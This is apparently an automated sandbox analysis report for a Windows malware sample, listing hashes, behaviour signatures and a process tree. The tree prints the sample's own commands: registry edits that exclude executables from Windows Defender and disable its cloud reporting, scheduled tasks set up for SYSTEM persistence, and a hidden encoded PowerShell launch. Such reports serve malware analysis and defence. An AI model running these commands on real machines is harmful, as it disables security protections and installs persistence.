Analysis
-
max time kernel
91s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
26-10-2022 12:33
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
4c3bf9f44cb3b0beafd4fdbe47a64eeb
-
SHA1
fc3dfad3a7e2197857a94514a186bfcfeeaf6b00
-
SHA256
324edc8acd355934c63a1fcaa6c4793d681302fa49d4f5233eaeafdc366e34ab
-
SHA512
36cacdb10d8da5f6c5fbf0c176db314cfb23ff15154f95d3a07038e191ffeece9467feed41a3294a25797937d5ce60c197fc0ca554895b54c68381f261ec4622
-
SSDEEP
196608:91O/pWMv3UnNQzQSlz+qCpqFWoYICsTs7YT5OS++5TM8pPwGt:3OxWRnN7SYZIjTsq5OSw2t
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 60 4936 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1036 Install.exe 2404 Install.exe 3792 zhRNVkM.exe 4432 iDhnHOo.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation iDhnHOo.exe -
Loads dropped DLL 1 IoCs
pid Process 4936 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json iDhnHOo.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json iDhnHOo.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini iDhnHOo.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA iDhnHOo.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 iDhnHOo.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol zhRNVkM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini zhRNVkM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 iDhnHOo.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 iDhnHOo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 iDhnHOo.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi iDhnHOo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja iDhnHOo.exe File created C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR\IGmpwFK.dll iDhnHOo.exe File created C:\Program Files (x86)\AJYQrkrAhIRXC\jFrMZxJ.dll iDhnHOo.exe File created C:\Program Files (x86)\AJYQrkrAhIRXC\IenZWZe.xml iDhnHOo.exe File created C:\Program Files (x86)\CrVpqlWoU\RNilAv.dll iDhnHOo.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak iDhnHOo.exe File created C:\Program Files (x86)\CrVpqlWoU\XdoHeCH.xml iDhnHOo.exe File created C:\Program Files (x86)\lVrlTdgfhXOU2\NRjNLielSARvn.dll iDhnHOo.exe File created C:\Program Files (x86)\lVrlTdgfhXOU2\oWGlYui.xml iDhnHOo.exe File created C:\Program Files (x86)\LzmXMIHnPUltEyKLVfR\uZfAeUH.xml iDhnHOo.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi iDhnHOo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak iDhnHOo.exe File created C:\Program Files (x86)\oQtMlHEnfKUn\obowCLC.dll iDhnHOo.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\gJECdJUNuqvNlNQ.job schtasks.exe File created C:\Windows\Tasks\CDUwqlMPSeBRbvnPZ.job schtasks.exe File created C:\Windows\Tasks\bKFjthDDlmdmBdSpYV.job schtasks.exe File created C:\Windows\Tasks\wLvsIRnBfEcGhlAOV.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4652 schtasks.exe 216 schtasks.exe 2040 schtasks.exe 2384 schtasks.exe 3708 schtasks.exe 4640 schtasks.exe 4500 schtasks.exe 3676 schtasks.exe 3208 schtasks.exe 4028 schtasks.exe 4964 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2339e045-0000-0000-0000-d01200000000}\NukeOnDelete = "0" iDhnHOo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" iDhnHOo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" iDhnHOo.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" iDhnHOo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" iDhnHOo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing iDhnHOo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume iDhnHOo.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2339e045-0000-0000-0000-d01200000000}\MaxCapacity = "15140" iDhnHOo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix iDhnHOo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ iDhnHOo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 3368 powershell.EXE 3368 powershell.EXE 4820 powershell.exe 4820 powershell.exe 1328 powershell.exe 1328 powershell.exe 2412 powershell.EXE 2412 powershell.EXE 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe 4432 iDhnHOo.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3368 powershell.EXE Token: SeDebugPrivilege 4820 powershell.exe Token: SeDebugPrivilege 1328 powershell.exe Token: SeDebugPrivilege 2412 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4312 wrote to memory of 1036 4312 file.exe 83 PID 4312 wrote to memory of 1036 4312 file.exe 83 PID 4312 wrote to memory of 1036 4312 file.exe 83 PID 1036 wrote to memory of 2404 1036 Install.exe 84 PID 1036 wrote to memory of 2404 1036 Install.exe 84 PID 1036 wrote to memory of 2404 1036 Install.exe 84 PID 2404 wrote to memory of 3784 2404 Install.exe 88 PID 2404 wrote to memory of 3784 2404 Install.exe 88 PID 2404 wrote to memory of 3784 2404 Install.exe 88 PID 2404 wrote to memory of 4460 2404 Install.exe 90 PID 2404 wrote to memory of 4460 2404 Install.exe 90 PID 2404 wrote to memory of 4460 2404 Install.exe 90 PID 3784 wrote to memory of 4848 3784 forfiles.exe 92 PID 3784 wrote to memory of 4848 3784 forfiles.exe 92 PID 3784 wrote to memory of 4848 3784 forfiles.exe 92 PID 4460 wrote to memory of 2320 4460 forfiles.exe 93 PID 4460 wrote to memory of 2320 4460 forfiles.exe 93 PID 4460 wrote to memory of 2320 4460 forfiles.exe 93 PID 4848 wrote to memory of 3104 4848 cmd.exe 94 PID 4848 wrote to memory of 3104 4848 cmd.exe 94 PID 4848 wrote to memory of 3104 4848 cmd.exe 94 PID 2320 wrote to memory of 1532 2320 cmd.exe 95 PID 2320 wrote to memory of 1532 2320 cmd.exe 95 PID 2320 wrote to memory of 1532 2320 cmd.exe 95 PID 4848 wrote to memory of 2844 4848 cmd.exe 96 PID 4848 wrote to memory of 2844 4848 cmd.exe 96 PID 4848 wrote to memory of 2844 4848 cmd.exe 96 PID 2320 wrote to memory of 4560 2320 cmd.exe 97 PID 2320 wrote to memory of 4560 2320 cmd.exe 97 PID 2320 wrote to memory of 4560 2320 cmd.exe 97 PID 2404 wrote to memory of 4640 2404 Install.exe 99 PID 2404 wrote to memory of 4640 2404 Install.exe 99 PID 2404 wrote to memory of 4640 2404 Install.exe 99 PID 2404 wrote to memory of 2432 2404 Install.exe 101 PID 2404 wrote to memory of 2432 2404 Install.exe 101 PID 2404 wrote to memory of 2432 2404 Install.exe 101 PID 3368 wrote to memory of 4832 3368 powershell.EXE 105 PID 3368 wrote to memory of 4832 3368 powershell.EXE 105 PID 2404 wrote to memory of 3724 2404 Install.exe 112 PID 2404 wrote to memory of 3724 2404 Install.exe 112 PID 2404 wrote to memory of 3724 2404 Install.exe 112 PID 2404 wrote to memory of 4652 2404 Install.exe 114 PID 2404 wrote to memory of 4652 2404 Install.exe 114 PID 2404 wrote to memory of 4652 2404 Install.exe 114 PID 3792 wrote to memory of 4820 3792 zhRNVkM.exe 118 PID 3792 wrote to memory of 4820 3792 zhRNVkM.exe 118 PID 3792 wrote to memory of 4820 3792 zhRNVkM.exe 118 PID 4820 wrote to memory of 4068 4820 powershell.exe 120 PID 4820 wrote to memory of 4068 4820 powershell.exe 120 PID 4820 wrote to memory of 4068 4820 powershell.exe 120 PID 4068 wrote to memory of 4468 4068 cmd.exe 121 PID 4068 wrote to memory of 4468 4068 cmd.exe 121 PID 4068 wrote to memory of 4468 4068 cmd.exe 121 PID 4820 wrote to memory of 4136 4820 powershell.exe 122 PID 4820 wrote to memory of 4136 4820 powershell.exe 122 PID 4820 wrote to memory of 4136 4820 powershell.exe 122 PID 4820 wrote to memory of 4664 4820 powershell.exe 123 PID 4820 wrote to memory of 4664 4820 powershell.exe 123 PID 4820 wrote to memory of 4664 4820 powershell.exe 123 PID 4820 wrote to memory of 2552 4820 powershell.exe 124 PID 4820 wrote to memory of 2552 4820 powershell.exe 124 PID 4820 wrote to memory of 2552 4820 powershell.exe 124 PID 4820 wrote to memory of 1696 4820 powershell.exe 125 PID 4820 wrote to memory of 1696 4820 powershell.exe 125
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Users\Admin\AppData\Local\Temp\7zSD6FC.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Users\Admin\AppData\Local\Temp\7zSDA76.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4848 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:3104
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2844
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2320 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1532
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:4560
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCDbQFdVc" /SC once /ST 05:13:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4640
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gCDbQFdVc"4⤵PID:2432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gCDbQFdVc"4⤵PID:3724
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bKFjthDDlmdmBdSpYV" /SC once /ST 12:34:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\VXuqdfXGxZocYTe\zhRNVkM.exe\" JF /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4652
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4832
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:924
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4648
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4160
-
C:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\VXuqdfXGxZocYTe\zhRNVkM.exeC:\Users\Admin\AppData\Local\Temp\LcMDsXLSmMLmtBGQR\VXuqdfXGxZocYTe\zhRNVkM.exe JF /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3792 -
